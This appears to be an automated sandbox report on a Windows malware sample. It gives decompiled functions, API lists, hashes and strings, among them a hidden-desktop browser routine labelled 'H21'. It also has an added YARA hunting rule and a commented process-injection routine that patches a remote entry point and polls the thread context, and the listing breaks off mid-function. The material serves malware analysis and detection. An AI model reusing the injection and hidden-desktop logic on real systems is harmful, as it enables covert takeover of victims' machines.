                                          • Opcode ID: bd3c2afa9b99237efc5eeef9aa2d561f0da5e196e2ceaca26c01c7e756f59dfd
                                          • Instruction ID: 505b62d31422aef80a28908d28af62d529573abac567a7d8d4f440a0149fd058
                                          • Opcode Fuzzy Hash: bd3c2afa9b99237efc5eeef9aa2d561f0da5e196e2ceaca26c01c7e756f59dfd
                                          • Instruction Fuzzy Hash: 6251E566202B8085FB55DF21E4587A93372FB84F88F588635DE5E4B718DF39C4A9C324
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 51%
                                          			E00C81E14(void* __ecx, void* __edx, long long __rbx, void* __rcx, long long __rdi, signed int __rsi, long long __rbp, signed int __r8, void* __r9) {
                                          				void* _v24;
                                          				void* _v84;
                                          				intOrPtr _v88;
                                          				void* _t40;
                                          				void* _t41;
                                          				signed int _t42;
                                          				signed char _t43;
                                          				signed int _t46;
                                          				signed int _t47;
                                          				signed int _t50;
                                          				signed int _t51;
                                          				signed int _t52;
                                          				signed int _t53;
                                          				signed int _t54;
                                          				signed int _t58;
                                          				signed int _t59;
                                          				signed int _t62;
                                          				signed int _t87;
                                          				signed int _t98;
                                          				signed int _t110;
                                          				signed int _t116;
                                          				signed int _t119;
                                          				signed int _t123;
                                          				void* _t133;
                                          
                                          				_t127 = __r9;
                                          				_t126 = __r8;
                                          				_t121 = __rbp;
                                          				_t63 = __rbx;
                                          				_t62 = _t123;
                                          				 *((long long*)(_t62 + 8)) = __rbx;
                                          				 *((long long*)(_t62 + 0x10)) = __rbp;
                                          				 *(_t62 + 0x18) = __rsi;
                                          				 *((long long*)(_t62 + 0x20)) = __rdi;
                                          				_t58 = r9d;
                                          				_t119 = __r8;
                                          				_t41 = E00C7FA04(_t40, __rbx, 0xc82aa4, __rcx, __r8, _t133);
                                          				_t116 = _t62;
                                          				r14d = 1;
                                          				if(_t62 == 0) {
                                          					L58:
                                          					return _t41;
                                          				}
                                          				_t41 = WaitForSingleObject();
                                          				if(_t41 == 0x102) {
                                          					__eflags = _t58;
                                          					if(_t58 != 0) {
                                          						goto L58;
                                          					}
                                          					__eflags = __r8;
                                          					if(__r8 == 0) {
                                          						goto L58;
                                          					}
                                          					_t6 = _t116 + 0x88; // 0x88
                                          					_t135 = _t6;
                                          					_t41 = E00C7BB64(_t62, _t63, _t6, __r8, __r9);
                                          					asm("bt eax, 0x9");
                                          					if(__eflags < 0) {
                                          						goto L58;
                                          					}
                                          					_t50 = __edx - 3;
                                          					__eflags = _t50;
                                          					if(_t50 == 0) {
                                          						_t42 = E00C82150(_t63, _t116, _t119);
                                          						__eflags = _t42;
                                          						if(_t42 != 0) {
                                          							L55:
                                          							_t34 = _t116 + 0x1a8; // 0x1a8
                                          							_t65 = _t34;
                                          							EnterCriticalSection(??);
                                          							_t41 = E00C822AC(0, _t62, _t34, _t116, _t119, _t121, _t126, _t127);
                                          							L56:
                                          							L57:
                                          							LeaveCriticalSection();
                                          							goto L58;
                                          						}
                                          						_t43 = E00C7BB64(_t62, _t63, _t135, _t119, __r9);
                                          						__eflags = _t43 & 0x00000020;
                                          						if((_t43 & 0x00000020) != 0) {
                                          							goto L55;
                                          						}
                                          						r8d = r14d;
                                          						_t41 = E00C82424(0, _t62, _t63, _t116, _t119, _t119, __rbp, _t126, __r9);
                                          						E00C7F4BC();
                                          						L54:
                                          						__eflags = r14d;
                                          						if(r14d == 0) {
                                          							goto L58;
                                          						}
                                          						goto L55;
                                          					}
                                          					_t51 = _t50 - 0x7ffd;
                                          					__eflags = _t51;
                                          					if(_t51 == 0) {
                                          						_t41 = E00C82150(_t63, _t116, _t119);
                                          						__eflags = _t41;
                                          						if(_t41 != 0) {
                                          							goto L58;
                                          						}
                                          						_t31 = _t116 + 0x1a8; // 0x1a8
                                          						_t65 = _t31;
                                          						EnterCriticalSection(??);
                                          						_t41 = E00C81B4C(_t31, _t116, _t119, _t116, _t119, __rbp, _t126, __r9);
                                          						goto L56;
                                          					}
                                          					_t52 = _t51 - r14d;
                                          					__eflags = _t52;
                                          					if(_t52 == 0) {
                                          						_t30 = _t116 + 0x1a8; // 0x1a8
                                          						EnterCriticalSection(??);
                                          						r8d = r14d;
                                          						_t41 = E00C81C90(__ecx, _t30, _t116, _t116, _t119, __rbp, __r9);
                                          						r14d = _t41;
                                          						L48:
                                          						LeaveCriticalSection();
                                          						goto L54;
                                          					}
                                          					_t53 = _t52 - r14d;
                                          					__eflags = _t53;
                                          					if(_t53 == 0) {
                                          						_t41 = IsWindowVisible();
                                          						__eflags = _t41;
                                          						if(_t41 != 0) {
                                          							goto L58;
                                          						}
                                          						_t22 = _t116 + 0x1a8; // 0x1a8
                                          						_t65 = _t22;
                                          						EnterCriticalSection(??);
                                          						_t62 =  *((intOrPtr*)(_t116 + 0x1d0));
                                          						while(1) {
                                          							__eflags = _t62;
                                          							if(_t62 == 0) {
                                          								break;
                                          							}
                                          							__eflags =  *_t62 - _t119;
                                          							if( *_t62 == _t119) {
                                          								break;
                                          							}
                                          							_t62 =  *((intOrPtr*)(_t62 + 0x38));
                                          						}
                                          						__eflags = _t62;
                                          						if(_t62 == 0) {
                                          							goto L56;
                                          						}
                                          						_t59 =  *(_t62 + 0x18);
                                          						r12d =  *(_t62 + 0x2c);
                                          						r15d =  *(_t62 + 0x14);
                                          						__eflags = _t59;
                                          						if(_t59 != 0) {
                                          							_t28 = _t62 + 0x18;
                                          							 *_t28 =  *(_t62 + 0x18) & 0x00000000;
                                          							__eflags =  *_t28;
                                          						}
                                          						LeaveCriticalSection();
                                          						__eflags = _t59;
                                          						if(_t59 != 0) {
                                          							__eflags = r12d;
                                          							if(r12d == 0) {
                                          								goto L55;
                                          							}
                                          							_t110 = _t119;
                                          							_t87 = _t116;
                                          							__eflags = r15d;
                                          							if(__eflags != 0) {
                                          								L34:
                                          								E00C7C170(__eflags, _t62, _t65, _t87, _t110, _t119, _t121, _t126, _t127);
                                          								goto L55;
                                          							}
                                          							r8d = r14d;
                                          							E00C82424(0, _t62, _t65, _t87, _t110, _t119, _t121, _t126, _t127);
                                          						}
                                          						goto L55;
                                          					}
                                          					_t54 = _t53 - r14d;
                                          					__eflags = _t54;
                                          					if(_t54 == 0) {
                                          						_t41 = IsWindowVisible();
                                          						__eflags = _t41;
                                          						if(_t41 == 0) {
                                          							goto L58;
                                          						}
                                          						_t13 = _t116 + 0x1a8; // 0x1a8
                                          						_t121 = _t13;
                                          						EnterCriticalSection(??);
                                          						_t65 =  *((intOrPtr*)(_t116 + 0x1d0));
                                          						while(1) {
                                          							__eflags = _t65;
                                          							if(_t65 == 0) {
                                          								break;
                                          							}
                                          							__eflags =  *_t65 - _t119;
                                          							if( *_t65 == _t119) {
                                          								break;
                                          							}
                                          							_t65 =  *((intOrPtr*)(_t65 + 0x38));
                                          						}
                                          						__eflags = _t65;
                                          						if(_t65 != 0) {
                                          							__eflags =  *(_t65 + 0x18);
                                          							if( *(_t65 + 0x18) != 0) {
                                          								L32:
                                          								LeaveCriticalSection();
                                          								goto L55;
                                          							}
                                          							__eflags =  *((long long*)(_t65 + 0x38));
                                          							 *(_t65 + 0x18) = r14d;
                                          							if( *((long long*)(_t65 + 0x38)) != 0) {
                                          								goto L32;
                                          							} else {
                                          								goto L28;
                                          							}
                                          							do {
                                          								L28:
                                          								_t119 =  *_t65;
                                          								_t46 = E00C7C050(_t62, _t65, _t135, _t119, _t119);
                                          								__eflags = _t46;
                                          								if(_t46 == 0) {
                                          									goto L31;
                                          								}
                                          								_t47 = E00C7B764(_t62, _t65, _t119);
                                          								__eflags = _t47;
                                          								if(_t47 == 0) {
                                          									goto L31;
                                          								}
                                          								__eflags = E00C7BB64(_t62, _t65, _t135, _t119, _t127) & 0x00000094;
                                          								if(__eflags == 0) {
                                          									LeaveCriticalSection();
                                          									_t110 = _t119;
                                          									_t87 = _t116;
                                          									goto L34;
                                          								}
                                          								L31:
                                          								_t65 =  *((intOrPtr*)(_t65 + 0x40));
                                          								__eflags = _t65;
                                          							} while (_t65 != 0);
                                          							goto L32;
                                          						}
                                          						goto L57;
                                          					}
                                          					__eflags = _t54 - 8;
                                          					if(_t54 != 8) {
                                          						goto L58;
                                          					}
                                          					_v88 = 0x3c;
                                          					_t41 = GetWindowInfo(??, ??);
                                          					EnterCriticalSection(??);
                                          					_t98 =  *((intOrPtr*)(_t116 + 0x1d0));
                                          					while(1) {
                                          						__eflags = _t98;
                                          						if(_t98 == 0) {
                                          							break;
                                          						}
                                          						__eflags =  *_t98 - _t119;
                                          						if( *_t98 == _t119) {
                                          							break;
                                          						}
                                          						_t98 =  *((intOrPtr*)(_t98 + 0x38));
                                          					}
                                          					__eflags = _t98;
                                          					if(_t98 == 0) {
                                          						r14d = 0;
                                          					} else {
                                          						r8d = 0x10;
                                          						_t41 = memcpy(??, ??, ??);
                                          					}
                                          					goto L48;
                                          				}
                                          				_t41 = E00C82544(_t41, _t116);
                                          				goto L58;
                                          			}

                                          (Instruction address column of the listing above, detached from the decompiled lines by extraction: addresses run over 0x00c81e14-0x00c8214f, with 0x00000000 for lines that carry no instruction address.)

                                          APIs
                                            • Part of subcall function 00C7FA04: EnterCriticalSection.KERNEL32 ref: 00C7FA20
                                            • Part of subcall function 00C7FA04: LeaveCriticalSection.KERNEL32 ref: 00C7FA4A
                                          • WaitForSingleObject.KERNEL32 ref: 00C81E60
                                          • GetWindowInfo.USER32 ref: 00C81EEC
                                          • EnterCriticalSection.KERNEL32 ref: 00C81EFC
                                          • memcpy.NTDLL ref: 00C81F2D
                                          • LeaveCriticalSection.KERNEL32 ref: 00C820A0
                                          • EnterCriticalSection.KERNEL32 ref: 00C8211A
                                          • LeaveCriticalSection.KERNEL32 ref: 00C8212B
                                            • Part of subcall function 00C82544: UnhookWinEvent.USER32 ref: 00C8256C
                                            • Part of subcall function 00C82544: UnhookWinEvent.USER32 ref: 00C82586
                                            • Part of subcall function 00C82544: UnhookWinEvent.USER32 ref: 00C825A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterEventLeaveUnhook$InfoObjectSingleWaitWindowmemcpy
                                          • String ID: <
                                          • API String ID: 4263224718-4251816714
                                          • Opcode ID: 41400bb98f58b1dcdafbadc621b341cb4aaf51fcb83b353ace0ea2e704bc10fe
                                          • Instruction ID: 54444a1b66d64f291831954ccacbf188e717796fd564dad7f9216bac42e104b2
                                          • Opcode Fuzzy Hash: 41400bb98f58b1dcdafbadc621b341cb4aaf51fcb83b353ace0ea2e704bc10fe
                                          • Instruction Fuzzy Hash: 8E71883130064186EE28BF229A5C77D63A9FB85FC8F589522DF1A07B14DF38CA469309
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SelectObject.GDI32(?,?,?,?,?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7D9C1
                                          • DeleteObject.GDI32 ref: 00C7D9CE
                                          • DeleteDC.GDI32 ref: 00C7D9DB
                                          • SelectObject.GDI32(?,?,?,?,?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7D9EF
                                          • DeleteObject.GDI32 ref: 00C7D9FC
                                          • DeleteDC.GDI32 ref: 00C7DA09
                                          • GetDC.USER32 ref: 00C7DA11
                                          • CreateCompatibleDC.GDI32 ref: 00C7DA24
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DA36
                                          • CreateCompatibleDC.GDI32 ref: 00C7DA44
                                          • CreateCompatibleBitmap.GDI32 ref: 00C7DA66
                                          • SelectObject.GDI32(?,?,?,?,?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DA82
                                          • SelectObject.GDI32(?,?,?,?,?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DAC6
                                          • SelectObject.GDI32(?,?,?,?,?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DB10
                                          • DeleteObject.GDI32 ref: 00C7DB3C
                                          • SelectObject.GDI32 ref: 00C7DB5D
                                          • DeleteObject.GDI32 ref: 00C7DB77
                                          • DeleteDC.GDI32 ref: 00C7DB91
                                          • DeleteDC.GDI32 ref: 00C7DBAB
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Object$Delete$Select$CompatibleCreate$BitmapErrorLast
                                          • String ID:
                                          • API String ID: 3176934299-0
                                          • Opcode ID: c341e61b8e7e056b35c5c5032506e6b38c71a8c44772ccabcad98c9536ab2a08
                                          • Instruction ID: ba3aa6e11e3949a5d78696e98961dbaf0b205417598577e9279b0d7d1b7bf1c5
                                          • Opcode Fuzzy Hash: c341e61b8e7e056b35c5c5032506e6b38c71a8c44772ccabcad98c9536ab2a08
                                          • Instruction Fuzzy Hash: 9251FC26202B8085FB15DF21D8587A92372FBC5F89F488235CE5E5BB58DF3AC469C324
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseErrorLastOpenhtons$FreeHandleHeapLibraryLoadModulehtonlwsprintf
                                          • String ID: InprocServer32$SOFTWARE\Classes\CLSID${%08X-%04X-%04X-%04X-%08X%04X}
                                          • API String ID: 4070548535-1088679775
                                          • Opcode ID: f9fa73df80b7946d9cd8fb4b917886576aeb41908b378137ba13bf5f4cb356d4
                                          • Instruction ID: 9c63509f7046e96e0b9b8a0f2f147932bcccfbc318e50108a6214ca414b7d1f8
                                          • Opcode Fuzzy Hash: f9fa73df80b7946d9cd8fb4b917886576aeb41908b378137ba13bf5f4cb356d4
                                          • Instruction Fuzzy Hash: A7414936711B549AFB208FA6E498BA933A0F748B89F418225EE5E42B54EF38C54DC714
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetEnvironmentVariableW.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A98D
                                          • HeapAlloc.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A9A8
                                          • GetEnvironmentVariableW.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A9C3
                                          • GetLastError.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A9D5
                                          • HeapFree.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A9E9
                                          • GetLastError.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7AA06
                                          • lstrcmpW.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7AA21
                                          • GetEnvironmentVariableW.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7AA37
                                          • HeapAlloc.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7AA54
                                          • GetEnvironmentVariableW.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7AA6F
                                          • lstrcatW.KERNEL32 ref: 00C7AA8F
                                          • SetLastError.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7AA9C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: EnvironmentVariable$ErrorHeapLast$Alloc$Freelstrcatlstrcmp
                                          • String ID: LOCALAPPDATA$USERPROFILE$\Local Settings\Application Data
                                          • API String ID: 3280976171-1870292887
                                          • Opcode ID: 9704a3e0be07ad33fe00cd86d56ea028e889eae136dacebb2726248183cf03d1
                                          • Instruction ID: ecf145279de0541476b638f0d5573bd5bb0381d27f38bee94e2b8c588438f960
                                          • Opcode Fuzzy Hash: 9704a3e0be07ad33fe00cd86d56ea028e889eae136dacebb2726248183cf03d1
                                          • Instruction Fuzzy Hash: E1317525300B4282FB109B67A994B2D63A1BBC9F90F84C525DD1E93B24EF3CC949DB15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00C7E3EE
                                          • GetThreadDesktop.USER32(?,?,?,00C6878C,?,?,?,?,00C6214C), ref: 00C7E406
                                          • SetThreadDesktop.USER32(?,?,?,00C6878C,?,?,?,?,00C6214C), ref: 00C7E414
                                          • HeapFree.KERNEL32(?,?,?,00C6878C,?,?,?,?,00C6214C), ref: 00C7E42F
                                          • SelectObject.GDI32(?,?,?,00C6878C,?,?,?,?,00C6214C), ref: 00C7E45F
                                          • DeleteObject.GDI32 ref: 00C7E478
                                          • SelectObject.GDI32(?,?,?,00C6878C,?,?,?,?,00C6214C), ref: 00C7E498
                                          • DeleteObject.GDI32 ref: 00C7E4B1
                                          • DeleteDC.GDI32 ref: 00C7E4CA
                                          • DeleteDC.GDI32 ref: 00C7E4E3
                                          • SelectObject.GDI32(?,?,?,00C6878C,?,?,?,?,00C6214C), ref: 00C7E503
                                          • DeleteObject.GDI32 ref: 00C7E51C
                                          • DeleteDC.GDI32 ref: 00C7E535
                                          • SelectObject.GDI32(?,?,?,00C6878C,?,?,?,?,00C6214C), ref: 00C7E565
                                          • DeleteObject.GDI32 ref: 00C7E57E
                                          • DeleteDC.GDI32 ref: 00C7E597
                                          • CloseDesktop.USER32(?,?,?,00C6878C,?,?,?,?,00C6214C), ref: 00C7E5AC
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteObject$Select$DesktopThread$CloseCurrentFreeHeap
                                          • String ID:
                                          • API String ID: 3677096374-0
                                          • Opcode ID: b3c1a23881f0f173b9678d650c73c5912f45f3bc04093d0eae5cfb375425d4db
                                          • Instruction ID: 9c285092eb954ee950f5b2e54d4dec75efa77710dc4f0d5b44dc7d8d687c8f06
                                          • Opcode Fuzzy Hash: b3c1a23881f0f173b9678d650c73c5912f45f3bc04093d0eae5cfb375425d4db
                                          • Instruction Fuzzy Hash: 28510D7A202B8089FB54DF61E4547693376FB88F88F8C8675CE5A4B618CF35C5A5C324
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Global$AllocByteCharCreateDesktopDialogFreeIndirectLockMultiParamShowThreadUnlockWideWindow
                                          • String ID: 2$Browser Starting Hidden (By: H21)...$My Dialog
                                          • API String ID: 750254547-4155922450
                                          • Opcode ID: 08d883a3c1c53071bf468b8e87ed4429bb287ea06d1dc78ce14e6d47d193044d
                                          • Instruction ID: c674a8e98051fd397d4e8ecf57221ebfe7b586b6fdd91fc903ecd51dc01d0504
                                          • Opcode Fuzzy Hash: 08d883a3c1c53071bf468b8e87ed4429bb287ea06d1dc78ce14e6d47d193044d
                                          • Instruction Fuzzy Hash: FF414732210A4186EB15CF22E854B9E77B0F788F98F95C225DE5A07B64DF3DC54ACB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%
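                                          The String ID fields of the three function blocks above (the CLSID/InprocServer32 format string, the LOCALAPPDATA fallback with the XP-era "\Local Settings\Application Data" suffix, and the "Browser Starting Hidden (By: H21)..." dialog text) are the most reusable artifacts in this part of the report. The YARA rule below is an added hunting example written by the editor; it is not one of the report's own "Yara matches", the rule name is arbitrary, and the strings are copied verbatim from the String ID lines, where `$` is the report's separator and not part of any string. The environment-variable names are declared wide only because the function calls GetEnvironmentVariableW; the other strings are declared ascii and wide because the report does not show their encoding. The CLSID entry matches the wsprintf format string as it sits in the binary, not the registry key name it produces at runtime, so it fires on the image or memory dump rather than on registry data.

```yara
rule hunt_492794_report_strings
{
    meta:
        description = "Strings listed in the decompiled-function blocks of Joe Sandbox analysis 492794; added hunting rule, not a report Yara match"
        sample_sha256 = "efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0"

    strings:
        // wsprintf format for a CLSID registry key (report: CloseErrorLastOpenhtons / wsprintf block).
        // Note the non-standard last group %08X%04X: the GUID is assembled from DWORD/WORD pieces,
        // consistent with the htonl/htons calls in the same function.
        $clsid_fmt    = "{%08X-%04X-%04X-%04X-%08X%04X}" ascii wide
        $clsid_key    = "SOFTWARE\\Classes\\CLSID" ascii wide
        $clsid_inproc = "InprocServer32" ascii wide

        // wide only: GetEnvironmentVariableW / lstrcmpW / lstrcatW in the same function
        // imply UTF-16LE literals in the image.
        $env_localappdata = "LOCALAPPDATA" wide
        $env_userprofile  = "USERPROFILE" wide
        $env_legacy_lad   = "\\Local Settings\\Application Data" wide

        // hidden-desktop dialog function (GetThreadDesktop/SetThreadDesktop block); encoding not shown
        $hidden_browser = "Browser Starting Hidden (By: H21)..." ascii wide

    condition:
        // no MZ/PE header check on purpose: the report's source dumps start at 0x00C61000,
        // past the PE header at 0x00C60000, so a header condition would miss them
        $hidden_browser or
        all of ($clsid_*) or
        ($env_legacy_lad and 1 of ($env_localappdata, $env_userprofile))
}
```

                                          Run it with `yara -s hunt.yar <dump-or-sample>` to print the matched strings and their offsets. The LOCALAPPDATA/USERPROFILE pair alone is common in legitimate software, which is why that branch of the condition also requires the legacy "\Local Settings\Application Data" suffix; the API order in the report (GetEnvironmentVariableW, lstrcmpW, GetEnvironmentVariableW, lstrcatW) suggests the function builds that path from USERPROFILE when LOCALAPPDATA is not set, but the report does not show the decompiled body, so treat that reading as an inference.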

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Event$HookMessage$CriticalObjectSectionSingleWait$DesktopDispatchEnterFreeHeapInitializeLeaveThreadTranslateUninitialize
                                          • String ID:
                                          • API String ID: 3930758508-0
                                          • Opcode ID: 88f409b536d2340212a010baedf8c8bb031ae199d6e67557849dfee2e2b5ced7
                                          • Instruction ID: e7a848ab03ddc37ba25504b2272bcd5212d5f0b4c089a9f13841becba90d3035
                                          • Opcode Fuzzy Hash: 88f409b536d2340212a010baedf8c8bb031ae199d6e67557849dfee2e2b5ced7
                                          • Instruction Fuzzy Hash: E9413E36610B4087FB519F21E858BAE7371F788F9AF948225DE4A07A58CF39C54DCB48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 27%
                                          			E00C614F8(intOrPtr __edx, void* __ebp, intOrPtr* __rcx, void* __rdx, void* __r8, void* __r9) {
                                          				void* __rbx;
                                          				void* __rsi;
                                          				void* __rbp;
                                          				long _t60;
                                          				void* _t68;
                                          				int _t69;
                                          				long _t86;
                                          				void* _t87;
                                          				void* _t88;
                                          				void* _t114;
                                          				long long _t115;
                                          				long long _t117;
                                          				void* _t120;
                                          				intOrPtr* _t131;
                                          				void* _t148;
                                          				intOrPtr _t149;
                                          				void* _t151;
                                          				intOrPtr* _t154;
                                          				void* _t157;
                                          				void* _t159;
                                          				void* _t160;
                                          				void* _t170;
                                          				long long _t171;
                                          				int _t173;
                                          				intOrPtr _t174;
                                          				intOrPtr _t175;
                                          				int _t177;
                                          				void* _t179;
                                          				void* _t180;
                                          				intOrPtr _t181;
                                          
                                          				_t170 = __r9;
                                          				_t88 = __ebp;
                                          				 *((intOrPtr*)(_t159 + 0x18)) = r8d;
                                          				 *((intOrPtr*)(_t159 + 0x10)) = __edx;
                                          				_push(_t120);
                                          				_t157 = _t159 - 0x458;
                                          				_t160 = _t159 - 0x558;
                                          				_t154 = __rcx;
                                          				r8d = 0x4d0; // 0x4d0 == sizeof(CONTEXT) on AMD64
                                          				memset(_t180, _t177, _t173); // zero the 0x4d0-byte CONTEXT buffer that GetThreadContext fills below
                                          				_t114 =  *__rcx;
                                          				r12d = 0;
                                          				_t181 =  *0xc95698; // 0x0
                                          				 *((long long*)(_t160 + 0x40)) = _t114;
                                          				 *((intOrPtr*)(_t157 + 0x4b8)) = 0xccccfeeb; // little-endian bytes EB FE CC CC: jmp $ (self-loop) plus int3 padding, the 4-byte patch written to the remote entry point below
                                          				E00C64E28( *((intOrPtr*)(__rcx + 0x10)), _t120, __rdx, _t171);
                                          				_t174 =  *_t154;
                                          				_t8 = _t171 + 0x10; // 0x10
                                          				r14d = 0;
                                          				 *((intOrPtr*)(_t157 - 0x50)) = 0x100003; // ContextFlags = CONTEXT_AMD64 | CONTEXT_CONTROL | CONTEXT_INTEGER
                                          				r14d =  !=  ? _t8 : r14d;
                                          				 *((intOrPtr*)(_t157 + 0x4a0)) = r14d;
                                          				E00C61E70();
                                          				_t151 = _t114;
                                          				if(_t114 == 0) {
                                          					L14:
                                          					_t175 =  *((intOrPtr*)(_t160 + 0x40));
                                          					_t115 = _t160 + 0x48;
                                          					 *((long long*)(_t160 + 0x20)) = _t115;
                                          					r9d = 4;
                                          					if(ReadProcessMemory(??, ??, ??, ??, ??) == 0 ||  *((intOrPtr*)(_t160 + 0x48)) != _t151) {
                                          						L27:
                                          						_t86 = GetLastError();
                                          						goto L28;
                                          					} else {
                                          						r9d = 4;
                                          						if(E00C61DD8(_t120, _t175, _t120, _t157, _t157 + 0x4b8) == 0) { // 4-byte write of the EB FE CC CC patch to the entry point (E00C61DD8 is not shown here; a WriteProcessMemory wrapper is the natural reading)
                                          							goto L27;
                                          						}
                                          						_t87 = 0x1770; // 6000 ms polling budget
                                          						while(1) {
                                          							ResumeThread();
                                          							Sleep(??);
                                          							SuspendThread(??);
                                          							_t87 = _t87 - 0x12c; // 300 ms per iteration, 20 polls at most
                                          							if(GetThreadContext(??, ??) == 0) {
                                          								goto L27;
                                          							}
                                          							if(_t87 <= 0 ||  *((intOrPtr*)(_t157 + 0x78)) == _t120) { // with ContextFlags at _t157 - 0x50, _t157 + 0x78 is CONTEXT.Rip (offset 0xf8): continue once the thread is parked on the patched entry point or the budget is spent
                                          								if(r14d != 0) {
                                          									E00C64FAC(_t115, _t120, _t181);
                                          									_t171 = _t115;
                                          									_t181 =  !=  ? _t115 : _t181;
                                          								}
                                          								_t131 = _t154;
                                          								if( *((intOrPtr*)(_t157 + 0x4b0)) == 0) {
                                          									r8d = r14d;
                                          									_t60 = E00C64C04(0x12c, _t87, _t115, _t120, _t131, _t181, _t154, _t157);
                                          								} else {
                                          									_t60 = E00C619A8(r14d, _t87, _t88, _t120, _t131, _t170);
                                          								}
                                          								_t86 = _t60;
                                          								SwitchToThread();
                                          								r9d = 4;
                                          								E00C61DD8(_t120, _t175, _t120, _t157, _t160 + 0x30); // second 4-byte write to the same target, from _t160 + 0x30 (presumably restoring the original entry-point bytes)
                                          								if(_t86 != 0xffffffff) {
                                          									L28:
                                          									if(( *(_t157 + 0x4a8) & 0x00000004) == 0) { // final resume unless the caller's flag bit at +0x4a8 asks to leave the thread suspended
                                          										ResumeThread();
                                          									}
                                          									if(_t171 != 0) {
                                          										E00C61E84();
                                          									}
                                          									return _t86;
                                          								} else {
                                          									goto L27;
                                          								}
                                          							} else {
